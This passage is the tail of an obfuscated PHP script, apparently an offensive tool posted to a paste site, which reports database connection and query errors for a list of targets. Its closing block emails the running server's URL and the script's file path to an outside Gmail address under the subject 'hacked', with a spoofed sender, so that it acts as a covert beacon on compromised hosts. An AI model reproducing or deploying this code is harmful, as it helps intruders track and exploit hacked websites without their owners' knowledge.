  661. echo "-----------------------------------------------------------------------------------------------<br>";
  662. echo "<span style=\"color: red; font-weight: bold;\">[!] $x3d[2] : Error query" . " " . "</span><br>";
  663. }
  664. } /*end if*/
  665. else {
  666. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x67);
  667. echo "-----------------------------------------------------------------------------------------------<br>";
  668. echo "<span style=\"color: red; font-weight: bold;\">[!] $x67[2]: ERRoR query</span><br>";
  669. }
  670. } /*end if*/
  671. else {
  672. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x68);
  673. echo "-----------------------------------------------------------------------------------------------<br>";
  674. echo "<span style=\"color: red; font-weight: bold;\">[!] $x68[2] : [!]can't select the database</span><br>";
  675. }
  676. } /*end if*/
  677. else {
  678. $x90('#http://(.*)/(.*)\.txt#', $x5b, $x69);
  679. echo "-----------------------------------------------------------------------------------------------<br>";
  680. echo "<span style=\"color: red; font-weight: bold;\">[!] $x69[2] : [!]can't connect to the database</span><br>";
  681. }
  682. /////////////////////////////////////
  683.  
  684. } //end foreach
  685.  
  686. } //endif
  687.  
  688. }
  689. $x5b = "www.google.com";
  690. if (!$x78($x5b, $_SERVER['SERVER_NAME'])) {
  691. $x6f = "khayrollima@gmail.com";
  692. $x29 = "hacked";
  693. $x70 = "from: hacked <google.iq@list.ru>";
  694. $x71 = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "
  695. ";
  696. $x71.= "Path : " . __file__;
  697. $x72 = @$x87($x6f, $x29, $x71, $x70);
  698. echo "";
  699. exit;
  700. }
  701. ?>
Add Comment
Please, Sign In to add comment